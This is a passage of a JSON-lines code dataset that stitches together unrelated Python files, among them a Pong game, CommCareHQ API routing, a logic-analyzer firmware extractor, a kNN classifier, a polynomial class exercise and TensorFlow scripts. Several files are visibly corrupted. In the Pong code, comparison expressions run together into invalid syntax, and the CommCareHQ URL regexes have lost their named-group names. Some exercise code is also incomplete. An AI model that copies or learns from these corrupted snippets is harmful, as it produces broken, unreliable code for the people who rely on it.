icetray.I3Frame.Physics])\n\n\n\ntray.Execute()\n\n\n","sub_path":"IceHive/resources/test/i3hivecleaningTest.py","file_name":"i3hivecleaningTest.py","file_ext":"py","file_size_in_byte":7234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25352504","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 7 18:12:47 2020\r\n\r\n@author: olga\r\n\"\"\"\r\n\r\nimport pandas\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n# Max Temperature of Warmest Month (BIO5) \t2.98\r\n# Precipitation of Coldest Quarter (BIO19) 7.67\r\n# Min Temperature of Coldest Month (BIO6) 7.83\r\n# Temperature Seasonality (BIO4) 7.84\r\n\r\n# Precipitation Seasonality (BIO15)\t 38.81\r\n# Mean Temperature of Driest Quarter (BIO9) \t64.42\r\n# Mean Diurnal Range (BIO2) \t \t68.44\r\n# Precipitation of Driest Quarter (BIO17) \t71.19\r\n\r\n\r\ndf = pandas.DataFrame(dict(graph=['\\n \\n trivial \\n regressions', '\\n \\n regressions \\n with Bayesian \\n simulations'],\r\n n1=[2.98, 38.81], # or, bl\r\n n2=[7.67, 64.42], # bl, or\r\n n3=[7.83, 68.44], # or, viol\r\n n4=[7.84, 71.19],)) # viol, bl\r\nind = np.arange(len(df))\r\nwidth = 0.23\r\n\r\nfig, ax = plt.subplots()\r\nax.barh(ind, df.n1, width, color=[\"orange\", \"blue\"], label='N1')\r\nax.barh(ind + width, df.n2, width, color=[\"blue\", \"orange\"], label='N2')\r\nax.barh(ind + width + width, df.n3, width, color=[\"orange\", \"purple\"], label='N3')\r\nax.barh(ind + width + width + width, df.n4, width, color=[\"purple\", \"blue\"], label='N4')\r\n\r\n\r\nax.set(yticks=ind + width + width + width, yticklabels=df.graph, ylim=[4*width - 1, len(df)])\r\n# ax.legend()\r\nplt.show()\r\n","sub_path":"R_squareds_for_models_big_bar_plot.py","file_name":"R_squareds_for_models_big_bar_plot.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285691276","text":"\n\ndef lowerBound(a, sub, n, x):\n left = 0\n right = n\n pos = right\n while left < right:\n mid = left + (right - left) // 2\n index = sub[mid]\n if a[index] <= x:\n pos = mid\n right = mid\n else:\n left = mid + 1\n return pos\n\ndef LIS(a):\n global path\n length = 1\n path = [-1] * len(a)\n dp.append(0)\n for i in range(1, len(a)):\n if a[i] >= a[dp[0]]:\n dp[0] = i\n elif a[i] <= a[dp[length - 1]]:\n path[i] = dp[length - 1]\n dp.append(i)\n length += 1\n else:\n pos = lowerBound(a, dp, length, a[i])\n path[i] = dp[pos - 1]\n dp[pos] = i\n return length\n\na = []\nresults = []\nwhile(1):\n rocket_high = int(input())\n if(rocket_high == -1 and len(a)==0):\n break\n if(rocket_high!=-1):\n a.append(rocket_high)\n if(rocket_high == -1 and len(a)>0):\n dp = []\n sequence_len = LIS(a)\n results.append(sequence_len)\n a = []\n continue\nfor i, result in enumerate(results):\n print(\"Test #\"+str(i+1)+':')\n print(\" maximum possible interceptions: \"+str(result))\n","sub_path":"BigOOrange/DP_3/Testing the CATCHER.py","file_name":"Testing the CATCHER.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552083131","text":"import re #Import regex for case insenstive search\n\ncars = {\n 'Ford': ['Falcon', 'Focus', 'Festiva', 'Fairlane'],\n 'Holden': ['Commodore', 'Captiva', 'Barina', 'Trailblazer'],\n 'Nissan': ['Maxima', 'Pulsar', '350Z', 'Navara'],\n 'Honda': ['Civic', 'Accord', 'Odyssey', 'Jazz'],\n 'Jeep': ['Grand Cherokee', 'Cherokee', 'Trailhawk', 'Trackhawk']\n}\n\n\n# Testing things\n# for models in cars.values():\n# for model in models:\n# print(model)\n\ndef get_all_jeeps(cars=cars):\n \"\"\"return a comma + space (', ') separated string of jeep models (original order)\"\"\"\n carString = \"\"\n jeepList = cars['Jeep']\n for jeep in jeepList:\n carString+=jeep+\", \"\n return carString[:-2]\n\nprint(get_all_jeeps())\n\n# Testing\n# for models in cars.values():\n# print(models)\n\ndef get_first_model_each_manufacturer(cars=cars):\n \"\"\"return a list of matching models (original ordering)\"\"\"\n firstModels=[]\n for models in cars.values():\n firstModels.append(models[0])\n return firstModels\n\nprint(get_first_model_each_manufacturer())\n\ndef get_all_matching_models(cars=cars, grep='trail'):\n \"\"\"return a list of all models containing the case insensitive\n 'grep' string which defaults to 'trail' for this exercise,\n sort the resulting sequence alphabetically\"\"\"\n matchList = []\n for models in cars.values():\n for model in models:\n if re.search(grep,model,re.IGNORECASE):\n matchList.append(model)\n return matchList\n\nprint(get_all_matching_models())\nprint(get_all_matching_models(grep='CO'))\n\ndef sort_car_models(cars=cars):\n \"\"\"sort the car models (values) and return the resulting cars dict\"\"\"\n for models in cars.values():\n models.sort()\n return cars\n\n# print(sort_car_models())\n","sub_path":"days/07-09-data-structures/myBite21/myCode/Bite21.py","file_name":"Bite21.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225991098","text":"class Solution:\n def hasGroupsSizeX(self, deck):\n dic = collections.Counter(x for x in deck)\n occu = []\n\n for i in dic:\n occu.append(dic[i])\n\n occu = set(occu)\n min_value = min(occu)\n if min_value < 2:\n return False\n for i in occu:\n if self.gcd(i, min_value) == 1:\n return False\n return True\n\n def gcd(self, a, b):\n if a < b:\n a, b = b, a\n while b != 0:\n tmp = a% b\n a = b\n b = tmp\n return a\n","sub_path":"python/914 X of a Kind in a Deck of Cards.py","file_name":"914 X of a Kind in a Deck of Cards.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56833945","text":"import re\nfrom corehq.apps.api.object_fetch_api import CaseAttachmentAPI\n\nfrom corehq.apps.api.domainapi import DomainAPI\nfrom corehq.apps.api.redis_assets import RedisAssetsAPI\nfrom corehq.apps.api.resources import v0_1, v0_2, v0_3, v0_4, v0_5\nfrom corehq.apps.commtrack.resources.v0_1 import ProductResource,\\\n StockStatusResource, StockReportResource, FullStockTransactionResource\nfrom corehq.apps.fixtures.resources.v0_1 import FixtureResource\nfrom corehq.apps.locations.resources.v0_1 import LocationResource\nfrom corehq.apps.reports.resources.v0_1 import ReportResource\nfrom django.conf.urls.defaults import *\nfrom django.http import HttpResponseNotFound\nfrom tastypie.api import Api\nfrom corehq.apps.api.es import XFormES\nfrom dimagi.utils.decorators import inline\n\nAPI_LIST = (\n ((0, 1), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_1.CommCareCaseResource,\n v0_1.XFormInstanceResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 2), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_2.CommCareCaseResource,\n v0_1.XFormInstanceResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 3), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_3.CommCareCaseResource,\n v0_3.XFormInstanceResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 4), (\n v0_1.CommCareUserResource,\n v0_1.WebUserResource,\n v0_4.ApplicationResource,\n v0_4.CommCareCaseResource,\n v0_4.GroupResource,\n v0_4.XFormInstanceResource,\n v0_4.RepeaterResource,\n v0_4.SingleSignOnResource,\n v0_4.HOPECaseResource,\n FixtureResource,\n ReportResource,\n )),\n ((0, 5), (\n v0_4.ApplicationResource,\n v0_4.CommCareCaseResource,\n v0_4.XFormInstanceResource,\n v0_4.RepeaterResource,\n v0_4.SingleSignOnResource,\n v0_4.HOPECaseResource,\n v0_5.CommCareUserResource,\n v0_5.WebUserResource,\n v0_5.GroupResource,\n v0_5.BulkUserResource,\n FixtureResource,\n ReportResource,\n )),\n)\n\n# eventually these will have to version too but this works for now\nCOMMTRACK_RESOURCES = (LocationResource, ProductResource, StockStatusResource,\n FullStockTransactionResource, StockReportResource)\n\nclass CommCareHqApi(Api):\n def top_level(self, request, api_name=None, **kwargs):\n return HttpResponseNotFound()\n\n @property\n def urls(self):\n \"\"\"\n Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.11/tastypie/api.py#L84\n (BSD-licensed) and hotfixed for https://github.com/toastdriven/django-tastypie/issues/816\n \"\"\"\n api_name_regex = re.escape(self.api_name)\n \n pattern_list = [\n url(r\"^(?P%s)%s$\" % (api_name_regex, trailing_slash()), self.wrap_view('top_level'), name=\"api_%s_top_level\" % self.api_name),\n ]\n \n for name in sorted(self._registry.keys()):\n self._registry[name].api_name = self.api_name\n pattern_list.append((r\"^(?P%s)/\" % api_name_regex, include(self._registry[name].urls)))\n \n urlpatterns = self.override_urls() + patterns('',\n *pattern_list\n )\n return urlpatterns\n \n\n@inline\ndef api_url_patterns():\n for version, resources in API_LIST:\n api = CommCareHqApi(api_name='v%d.%d' % version)\n for R in resources:\n api.register(R())\n for R in COMMTRACK_RESOURCES:\n api.register(R())\n yield (r'^', include(api.urls))\n yield url(r'^v0.1/xform_es/$', XFormES.as_domain_specific_view())\n # HACK: fix circular import here, to fix later\n try:\n from pact.api import PactAPI\n except ImportError:\n pass # maybe pact isn't installed\n for view_class in DomainAPI.__subclasses__():\n yield url(r'^custom/%s/v%s/$' % (view_class.api_name(), view_class.api_version()), view_class.as_view(), name=\"%s_%s\" % (view_class.api_name(), view_class.api_version()))\n yield url(r'^case/attachment/(?P[\\w\\-]+)/(?P.*)/(?P.*)$', CaseAttachmentAPI.as_view(), name=\"api_case_attachment\")\n yield url(r'^redis_assets/$', RedisAssetsAPI.as_view())\n\n\nurlpatterns = patterns('',\n *list(api_url_patterns))\n","sub_path":"corehq/apps/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30385808","text":"#!/usr/bin/env python2.7\nimport sys\nfrom random import randint\nimport pygame\nfrom pygame.locals import *\n\nfrom Ball import Ball\nfrom Player import Player\n\npygame.font.init()\n\nclass Pong:\n\n def __init__(self,window_size,nb_players=2):\n self.width,self.height = window_size\n self.nb_players = nb_players\n self.ball = Ball(10,(self.width/2,self.height/2)) \n # Fill background\n self.screen = pygame.display.set_mode((self.width, self.height))\n self.background = pygame.Surface(self.screen.get_size())\n self.background = self.background.convert()\n self.background.fill((0,0,0))\n self.coef_y = randint(-10,10)\n self.coef_x = -1#[-1,1][randint(0,1)]\n self.ball_tracked = True\n self.p1 = Player(1,'toto',self.height/6,self.height/2)\n self.p2 = Player(2,'titi',self.height/6,self.height/2)\n\n def draw(self):\n\n # Display ball\n ball_s = self.ball.gen_surface()\n ball_pos = (self.ball.x, self.ball.y)\n self.background.fill((0, 0, 0))\n self.background.blit(ball_s, ball_pos)\n \n # Display Player Walls\n wall_p1 = self.p1.gen_surface()\n self.background.blit(wall_p1, (0,self.p1.wall_y))\n\n wall_p2 = self.p2.gen_surface()\n self.background.blit(wall_p2, (self.width-10,self.p2.wall_y))\n\n # Blit everything to the screen\n self.screen.blit(self.background, (0,0))\n\n \n def movments_calcul(self):\n if self.ball.x > (self.width-10-(self.ball.d)):\n if self.ball.y>self.p1.wall_y and self.ball.yself.p1.wall_y and self.ball.y (self.height-2-self.ball.d/2):\n self.coef_y = self.coef_y * (-1)\n elif self.ball.y<3:\n self.coef_y = self.coef_y * (-1)\n \n self.ball.x = self.ball.x+self.coef_x\n self.ball.y = self.ball.y+self.coef_y\n\n def is_on_wall(self,pos):\n x,y = pos\n x = self.ball.x\n y = self.ball.y\n\n if self.nb_players == 2:\n if y<3 or y>self.height-3 :\n return True \n else : \n return False\n \n def draw_wall(self):\n if self.nb_players == 2:\n white = (255,255,255)\n pygame.draw.rect(self.screen,white,(0,0,self.width,2))\n pygame.draw.rect(self.screen,white,(0,self.height-2,self.width,self.height))\n\n def run(self):\n # Initialise screen\n pygame.init()\n pygame.display.set_caption('Pong')\n\n\n # Event loop\n while 1:\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n if event.type == KEYDOWN:\n if event.key == K_UP and self.p1.wall_y>self.p1.wall_long:\n self.p1.wall_y = self.p1.wall_y-self.p1.wall_long\n elif event.key == K_DOWN and self.p1.wall_y\n##\n## This program is free software; you can redistribute it and/or modify\n## it under the terms of the GNU General Public License as published by\n## the Free Software Foundation; either version 3 of the License, or\n## (at your option) any later version.\n##\n## This program is distributed in the hope that it will be useful,\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n## GNU General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with this program; if not, see .\n##\n\n\nimport sys\nimport os\nimport hashlib\nimport struct\n\n\n'''\nLA_MODEL_NAME => { \n SHA256 => {\n FW => ( start, size ),\n BIN => ( start, size )\n }\n }\n'''\nfw_offsets_dict = {\n \"LA1010\" : { \"e46c7a334b81769535bef396515fe2f1a5b2888f7a9963a5f34dfba8902b920f\" :\n { \"FW\" : ( 0x323F8, 0x1948 ), \"BIN\" : ( 0x13A58, 0x1E9A0 ) }\n }\n }\n\ndef createFileName(laname, ext, dirname, basename):\n result = laname + '.' + ext\n if result == basename:\n result = basename + '.' + ext\n return (os.path.join(dirname, result), result);\n\ndef main():\n if len(sys.argv) != 2:\n print('Usage: {} '.format(os.path.basename(sys.argv[0])))\n return -1\n filename = sys.argv[1]\n dirname = os.path.dirname(filename)\n base = os.path.basename(filename)\n laname = os.path.splitext(base)[0].upper()\n (hexfilepath, hexfilename) = createFileName(laname, 'hex', dirname, base)\n (fwfilepath, fwfilename) = createFileName(laname, 'fw', dirname, base)\n (binfilepath, binfilename) = createFileName(laname, 'bitstream', dirname, base)\n try:\n fw_offsets = fw_offsets_dict[laname];\n except KeyError:\n print('LA \\'{}\\' isn\\'t supported'.format(laname))\n return -1\n with open(filename, 'rb') as f:\n data = f.read()\n sha256 = hashlib.sha256(data).hexdigest().lower()\n try:\n fw_offsets = fw_offsets[sha256];\n except KeyError:\n print('This version of \\'{}\\' library isn\\'t supported. Wrong SHA256'.format(base))\n return -1\n out_bytes = data[fw_offsets[\"BIN\"][0] : fw_offsets[\"BIN\"][0] + fw_offsets[\"BIN\"][1]]\n with open(binfilepath, 'wb') as f:\n f.write(out_bytes)\n print('Spartan bitstream saved to {}'.format(binfilepath))\n out_bytes = data[fw_offsets[\"FW\"][0] : fw_offsets[\"FW\"][0] + fw_offsets[\"FW\"][1]]\n idx = 0\n fw_out_data = bytearray()\n for i in range(0x4000):\n fw_out_data.append(0)\n with open(hexfilepath, 'w') as f:\n while idx < fw_offsets[\"FW\"][1]:\n check_sum = (out_bytes[idx] + out_bytes[idx + 1] + out_bytes[idx + 2]) & 0xFF\n (addr, size) = struct.unpack(\" (batch, n_steps, cell_size)\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size], name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.nn.rnn_cell.LSTMCell(self.cell_size, forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size, dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(\n lstm_cell, self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n # shape = (batch * steps, cell_size)\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name='2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size, ])\n # shape = (batch * steps, output_size)\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example(\n [tf.reshape(self.pred, [-1], name='reshape_pred')],\n [tf.reshape(self.ys, [-1], name='reshape_target')],\n [tf.ones([self.batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True,\n softmax_loss_function=self.ms_error,\n name='losses'\n )\n with tf.name_scope('average_cost'):\n self.cost = tf.div(\n tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size,\n name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0., stddev=1., )\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(name=name, shape=shape, initializer=initializer)\n","sub_path":"rnn_model.py","file_name":"rnn_model.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118575203","text":"# python 使用字典代替switch\n\nswitcherDict = {\n 0 : 'Sunday', \n 1 : 'Monday',\n 2 : 'Tuesday'\n}\n\nday_name = switcherDict[0]\nprint(day_name)\nday_name1 = switcherDict.get(5, 'Unkown')\nprint(day_name1)\n\n# 列表推导式\na = [1,2,3,4,5,6,7,8,9]\nb = [i**2 for i in a]\nprint(b)\n\n\nstudent = {\n '老熊': 18,\n '熊二': 19,\n '熊三': 20\n}\n\nbb = [key for key,value in student.items()]\nprint(bb)","sub_path":"python2/C11.py","file_name":"C11.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437434434","text":"# \n# k-临近算法\n# kNN\n# \n# Created by wuwenhan on 5/2/16.\n# 16:55\n# Copyright (c) 2016 吴问涵. All rights reserved.\n#\n\nfrom numpy import *\nimport operator\n\ndef classify0(inX, dataSet, labels, k):\n\t\"\"\" 分类器: 利用k-临近算法将每组数据划分到某个类\n\t:param inX: 用于分类的输入向量\n\t:param dataSet: 输入的训练样本集\n\t:param labels: 标签向量\n\t:param k: 选择最近邻居的数目\n\t:return: 发生频率最高的元素标签\n\t\"\"\"\n\n\t# 训练样本集行数\n\tdataSetSize = dataSet.shape[0]\n\n\t# 距离计算\n\t# 将输入向量复制 dataSetSize 次\n\t# [[ 0 0 0 ] [[ a1 b1 c1 ] |\n\t# ... - .... | dataSetSize\n\t# [ 0 0 0 ]] [ an bn cn ]] |\n\tdiffMat = tile(inX, (dataSetSize, 1)) - dataSet\n\n\t# [[ a1^2 b1^2 c1^2 ]\n\t# ....\n\t# [ an^2 bn^2 cn^2 ]]\n\tsqDiffMat = diffMat ** 2\n\n\t# [[ a1^2 + b1^2 + c1^2 ]\n\t# ....\n\t# an^2 + bn^2 + cn^2 ]]\n\tsqDistances = sqDiffMat.sum(axis = 1)\n\n\t# [[ √(a1^2 + b1^2 + c1^2) ]\n\t# ....\n\t# √(an^2 + bn^2 + cn^2) ]]\n\tdistances = sqDistances ** 0.5\n\n\t# 从小到达排序, sortedDistIndicies 的每个元素为 distances 中元素排序前的下标\n\tsortedDistIndicies = distances.argsort()\n\tclassCount = {}\n\n\t# 选择距离最小的k个点\n\tfor i in range(k):\n\t\t# 选择距离最近的点的分类\n\t\tvoteIlabel = labels[sortedDistIndicies[i]]\n\t\t# 若字典 classCount 中存在 key: voteIlabel, 则 value += 1; 否则置 0\n\t\tclassCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n\n\t# 排序\n\t# 对字典 classCount 中所有的 (key, value) 排序, 排序规则为 value从大到小\n\tsortedClassCount = sorted(classCount.items(), key = operator.itemgetter(1), reverse = True)\n\n\t# 返回发生频率最高的元素标签, 即 sortedClassCount 第一个元组的第一个元素\n\treturn sortedClassCount[0][0]\n\ndef autoNorm(dataSet):\n\t\"\"\"\n\t:param dataSet: 待处理训练样本矩阵\n\t:return: 归一化矩阵, 取值范围, 最小值\n\t\"\"\"\n\n\t# 最小值, 最大值和取值范围\n\t# [ min(a) min(b) min(c) ]\n\tminVals = dataSet.min(0)\n\t# [ max(a) max(b) max(c) ]\n\tmaxVals = dataSet.max(0)\n\t# [ range(a) range(b) range(c) ]\n\tranges = maxVals - minVals\n\n\t# 填充归一化矩阵\n\tnormDataSet = zeros(shape(dataSet))\n\tprint(normDataSet)\n\n\t# 训练样本集行数\n\tm = dataSet.shape[0]\n\n\t# 用最小值填充矩阵并将数据集与最小值相减\n\t# [ [ a1-min(a) b1-min(b) c1-min(c) ]\n\t# ...\n\t# [ an-min(a) bn-min(b) cn-min(c) ] ]\n\tnormDataSet = dataSet - tile(minVals, (m,1))\n\n\t# 除以范围矩阵(非矩阵相除,是矩阵每个元素对应相除), 归一化\n\t# [[ a1/range(a) b1/range(b) c1/range(c) ]\n\t# ...\n\t# [ an/range(a) bn/range(b) cn/range(c) ]]\n\tnormDataSet = normDataSet/tile(ranges, (m,1))\n\n\t# 返回归一化后的训练样本集, 取值范围, 最小值\n\treturn normDataSet, ranges, minVals\n\nlabels = {\n\t'largeDoses': 3,\n\t'smallDoses': 2,\n\t'didntLike': 1\n}\n\ndef file2matrix(filename):\n fr = open(filename)\n\n # 得到文件行数\n arrayOfLines = fr.readlines()\n numberOfLines = len(arrayOfLines)\n\n # 创建返回的 NumPy 矩阵\n returnMat = zeros((numberOfLines, 3))\n classLabelVector = []\n\n index = 0\n\n # 解析文件数据到列表\n for line in arrayOfLines:\n line = line.strip()\n listFromLine = line.split('\\t')\n returnMat[index,:] = listFromLine[0:3]\n\n if filename == 'datingTestSet.txt':\n classLabelVector.append(labels[listFromLine[-1]])\n else:\n classLabelVector.append(int(listFromLine[-1]))\n\n index += 1\n\n return returnMat, classLabelVector\n\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr = open(filename)\n\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0, 32*i+j] = int(lineStr[j])\n\n return returnVect","sub_path":"k-临近算法/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587926329","text":"class Poly:\r\n \r\n def __init__(self,*terms):\r\n # __str__ uses the name self.terms for the dictionary of terms\r\n # So __init__ should build this dictionary from terms\r\n self.terms = {}\r\n for tups in terms:\r\n if type(tups[0]) not in (int, float):\r\n raise AssertionError('The coefficient is not an int or a float value')\r\n elif tups[0] == 0:\r\n pass\r\n elif type(tups[1]) is not int or tups[1] < 0:\r\n raise AssertionError('The power is not a positive integer')\r\n elif tups[1] in self.terms.keys():\r\n raise AssertionError('That power is already in the dictionary')\r\n else:\r\n self.terms[tups[1]] = tups[0]\r\n \r\n # Fill in the rest of this method, using *terms to intialize self.terms\r\n\r\n \r\n # I have written str(...) because it is used in the bsc.txt file and\r\n # it is a bit subtle to get correct. Notice that it assumes that\r\n # every Poly object stores a dict whose keys are powers and whose\r\n # associated values are coefficients. This function does not depend\r\n # on any other method in this class being written correctly. \r\n def __str__(self):\r\n def term(c,p,var):\r\n return (str(c) if p == 0 or c != 1 else '') +\\\r\n ('' if p == 0 else var+('^'+str(p) if p != 1 else ''))\r\n if len(self.terms) == 0:\r\n return '0'\r\n else:\r\n return ' + '.join([term(c,p,'x') for p,c in sorted(self.terms.items(),reverse=True)]).replace('+ -','- ')\r\n \r\n def __repr__(self):\r\n return 'Poly('+','.join('('+str(self.terms[i])+','+str(i)+')' for i in self.terms.keys())+')'\r\n\r\n \r\n def __len__(self):\r\n power_list = []\r\n for power in self.terms.keys():\r\n power_list.append(power)\r\n if power_list == []:\r\n return 0\r\n else:\r\n return max(power_list)\r\n \r\n def __call__(self,arg):\r\n if type(arg) not in (int, float):\r\n raise AssertionError('Input value is not an int or a float')\r\n else:\r\n answer = 0\r\n for power in self.terms.keys():\r\n answer += self.terms[power]*(arg**power)\r\n return answer\r\n \r\n\r\n def __iter__(self):\r\n for power in sorted(self.terms.keys(), reverse = True):\r\n yield (self.terms[power], power)\r\n \r\n\r\n def __getitem__(self,index):\r\n if type(index) is not int or index < 0:\r\n raise TypeError('The index is not a positive integer')\r\n elif index not in self.terms.keys():\r\n return 0\r\n else:\r\n return self.terms[index]\r\n \r\n\r\n def __setitem__(self,index,value):\r\n if type(index) is not int or index < 0:\r\n raise TypeError('The index is not a positive integer')\r\n elif value == 0:\r\n if value in self.terms.values():\r\n del self.terms[index]\r\n else:\r\n pass\r\n else:\r\n self.terms[index] = value\r\n \r\n\r\n def __delitem__(self,index):\r\n if type(index) is not int or index < 0:\r\n raise TypeError('The index is not a positive integer')\r\n elif index not in self.terms.keys():\r\n pass\r\n else:\r\n del self.terms[index]\r\n \r\n\r\n def _add_term(self,c,p):\r\n if type(c) not in (int, float):\r\n raise TypeError('The coefficient is not an int or float')\r\n elif type(p) is not int or p < 0:\r\n raise TypeError('The power is not a positive integer')\r\n elif p not in self.terms.keys() and c != 0:\r\n self.terms[p] = c\r\n elif p in self.terms.keys():\r\n new_val = self.terms[p] + c\r\n if new_val == 0:\r\n del self.terms[p]\r\n else:\r\n self.terms[p] = new_val\r\n \r\n\r\n def __add__(self,right):\r\n if type(right) not in (Poly, int, float):\r\n raise TypeError('The argument is not a valid type')\r\n elif type(right) is int or type(right) is float:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n if power == 0:\r\n new_poly.append((self.terms[power] + right, power))\r\n else:\r\n new_poly.append((self.terms[power], power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n else:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n if power in right.terms.keys():\r\n new_poly.append((self.terms[power] + right.terms[power], power))\r\n else:\r\n new_poly.append((self.terms[power], power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n\r\n \r\n def __radd__(self,left):\r\n if type(left) not in (int, float):\r\n raise TypeError('The argument is not a valid type')\r\n else:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n if power == 0:\r\n new_poly.append((self.terms[power] + left, power))\r\n else:\r\n new_poly.append((self.terms[power], power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n \r\n\r\n def __mul__(self,right):\r\n if type(right) not in (Poly, int, float):\r\n raise TypeError('The second argument is not an int, float, or Poly type')\r\n elif type(right) is int or type(right) is float:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n new_poly.append((self.terms[power]*right, power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n \r\n\r\n def __rmul__(self,left):\r\n if type(left) not in (int, float):\r\n raise TypeError('Left argument is not an int or float')\r\n else:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n new_poly.append((self.terms[power]*left, power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n \r\n\r\n def __eq__(self,right):\r\n if type(right) not in (Poly, int, float):\r\n raise TypeError('The second argument is not a Poly, int, or float')\r\n elif type(right) is int or type(right) is float:\r\n if len(self.terms.keys()) == 1 and 0 in self.terms.keys():\r\n if self.terms[0] == right:\r\n return True\r\n else: return False\r\n else: return False\r\n else:\r\n if self.terms.keys() == right.terms.keys():\r\n for power in self.terms.keys():\r\n if self.terms[power] == right.terms[power]:\r\n return True\r\n else: return False\r\n else: return False\r\n\r\n \r\nif __name__ == '__main__':\r\n # Some simple tests; you can comment them out and/or add your own before\r\n # the driver is called.\r\n print('Start simple tests')\r\n p = Poly((3,2),(-2,1), (4,0))\r\n print(' For Polynomial: 3x^2 - 2x + 4')\r\n print(' str(p):',p)\r\n print(' repr(p):',repr(p))\r\n print(' len(p):',len(p))\r\n print(' p(2):',p(2))\r\n print(' list collecting iterator results:',[t for t in p])\r\n print(' p+p:',p+p)\r\n print(' p+2:',p+2)\r\n print(' p*p:',p*p)\r\n print(' p*2:',p*2)\r\n print('End simple tests\\n')\r\n \r\n import driver\r\n #driver.default_show_exception=True\r\n #driver.default_show_exception_message=True\r\n #driver.default_show_traceback=True\r\n driver.driver()","sub_path":"ics 33/solutions/ile2 solutions/Lab 6/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":7756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457690591","text":"import scipy.io\r\nimport numpy as np\r\nfrom random import shuffle\r\nimport random\r\nimport scipy.ndimage\r\nfrom skimage.util import pad\r\nimport os\r\nimport time\r\nimport pandas as pd\r\nfrom utils import convertToOneHot\r\nimport math\r\nimport tensorflow as tf\r\nimport argparse\r\n\r\n# f=open(\"test12_india_pines.txt\",\"w\")\r\nf=open(\"simple41_india_pines.txt\",\"w\")\r\n# f=open(\"test31_india_pines.txt\",\"w\")\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--data', type=str, default='Indian_pines')\r\nparser.add_argument('--patch_size', type=int, default=11)\r\nparser.add_argument('--batch_size', type=int, default=128)\r\nparser.add_argument('--train_size', type=float, default=0.8)\r\nparser.add_argument('--isnorm', type=int, default=1)\r\nparser.add_argument('--training_iters', type=int, default=10000)\r\nopt = parser.parse_args()\r\n# f=open(\"out.txt\",\"w\")\r\nDATA_PATH = os.path.join(os.getcwd(),\"Data\")\r\nData = scipy.io.loadmat('./Data/' + opt.data + '.mat')[opt.data.lower()]\r\nLabel = scipy.io.loadmat('./Data/' + opt.data + '_gt.mat')[opt.data.lower() + '_gt']\r\nHeight, Width, Band = Data.shape[0], Data.shape[1], Data.shape[2]\r\nNum_Classes = len(np.unique(Label))\r\npatch_size=opt.patch_size\r\nbatch_size=opt.batch_size\r\ntraining_iters = opt.training_iters\r\nData = 